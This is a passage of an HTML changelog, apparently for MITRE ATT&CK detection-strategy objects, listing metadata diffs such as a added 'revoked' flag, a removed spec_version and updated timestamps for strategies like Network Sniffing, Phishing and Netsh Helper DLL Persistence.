1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0155] Detection Strategy for Modify Cloud Resource Hierarchy</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0170] Detection Strategy for Modify System Image on Network Devices</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0160] Detection Strategy for Multi-Factor Authentication Request Generation (T1621)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0432] Detection Strategy for NTFS File Attribute Abuse (ADS/EAs)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0575] Detection Strategy for Netsh Helper DLL Persistence via Registry and Child Process Monitoring (Windows)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0163] Detection Strategy for Network Address Translation Traversal</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0006] Detection Strategy for Network Boundary Bridging</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0233] Detection Strategy for Network Device Configuration Dump via Config Repositories</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0314] Detection Strategy for Network Sniffing Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0227] Detection Strategy for Non-Standard Ports</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0553] Detection Strategy for Obfuscated Files or Information: Binary Padding</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0164] Detection Strategy for Overwritten Process Arguments Masquerading</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0469] Detection Strategy for Patch System Image on Network Devices</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0070] Detection Strategy for Phishing across platforms.</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0109] Detection Strategy for Plist File Modification (T1647)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: 